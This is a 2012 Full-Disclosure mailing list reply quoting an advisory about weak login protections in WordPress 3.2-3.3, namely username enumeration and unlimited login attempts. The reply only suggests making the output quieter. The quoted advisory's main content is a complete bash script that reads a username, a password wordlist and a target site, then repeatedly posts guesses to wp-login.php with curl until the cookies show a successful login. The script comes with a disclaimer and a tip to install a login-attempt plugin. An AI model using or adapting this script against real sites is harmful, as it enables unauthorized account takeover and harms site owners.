Re: WordPress BruteForce Script

[R00T_ATI <r00t_ati () ihteam net>]

Just an advice CorryL,
add "--silent" in curl, to avoid annoying output

Il 29/04/2012 18:09, CorryL ha scritto:
> -=[--------------------ADVISORY-------------------]=-
>
> WordPress BruteForce Script
>
> Author: Corrado Liotta Aka CorryL [corryl80 () gmail com] #x0n3-h4ck will
> never die#
> -=[-----------------------------------------------]=-
>
>
> -=[+] Application: WordPress
> -=[+] Version: 3.2-3.3
> -=[+] Vendor's URL: Wordpres.org
> -=[+] Platform: Windows\Linux\Unix
> -=[+] Bug type: BruteForce
> -=[+] Exploitation: Remote
> -=[-]
> -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
> -=[+] Facebook: https://www.facebook.com/CorryL
> -=[+] Twitter: https://twitter.com/#!/CorradoLiotta
> -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611
> -=[+] +Google: https://plus.google.com/u/0/109396477464303670923
>
> ...::[ Descriprion ]::..
>
> What I am about to describe is not a new thing, but I wanted to create
> this simple script,
> to show how easily it is possible to violate famous as a cms wordpress,
> unfortunately like most of you know wordpress has some minor problems
> related to the security module login,
> in practice as you will see in the picture any user can discover a
> user actually
> exists simply trying to enter any passwords, because if the CMS
> recognizes that the user is present
> in the database but the password is wrong return this message "the
> password for the admin user is not correct ",
> so this makes us understand that the admin user exists,
> and that you need only enter the correct password. Another small flaw
> security of this CMS
> is that it has no control on the default login attemps,
> this allows a attaker do not want all the attempts that never stopped coming,
> a TIP that I give to all those who use this cms is to install a plugin
> for login attemps,
> we find several directories inside the plugins wordpress.org
>
>
>
>
> ...::[ Proof Of Concept ]::..
>
> Image: http://img832.imageshack.us/img832/4481/wordpressbrute.jpg
>
> ...::[ Script ]::..
>
> #!/bin/bash
> echo "Wordpress Bruteforcing By Corrado Liotta Aka CorryL"
> # Questo script è stato creato a scopo illustrativo.
> # Non mi ritengo responsabile sull'uso inappropriato.
> # La violazione di sistema informatico non autorizzato
> # è punibile per legge Art. 615 Ter
> # Installa sul tuo blog wordpress un plugin per il login attemp.
> echo "Username"; read USER;
> echo "Wordlist Password"; read WLIST;
> echo "Sito Web"; read WEB;
>
>
> while read line
> do
> echo "--->  TESTING ${line} per l'utente $USER"
> curl --output test.html --cookie-jar c.cookie --data
> "log=$USER&pwd=${line}&wp-submit=Collegati&redirect_to=http%3A%2F%2F$WEB%2Fwp-admin%2F&testcookie=1"
> "http://$WEB/wp-login.php";
> cat c.cookie>COOK
> PARSE=$(cat test.html |grep "La password inserita per l'utente")
> CHECK=$(cat COOK|grep "#HttpOnly")
> if [ "$CHECK" != "" ]; then
> echo "-->  Utente $USER PASSWORD TROVATA ! -->   ${line} "
> break
> else
> echo "-->  Utente $USER PASSWORD Non Trovata !"
> fi
>
>
> done<  $WLIST
>
>
>
> ..::[ Disclousure Timeline ]::..
>
> [29/04/2012] - Public Disclousure
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/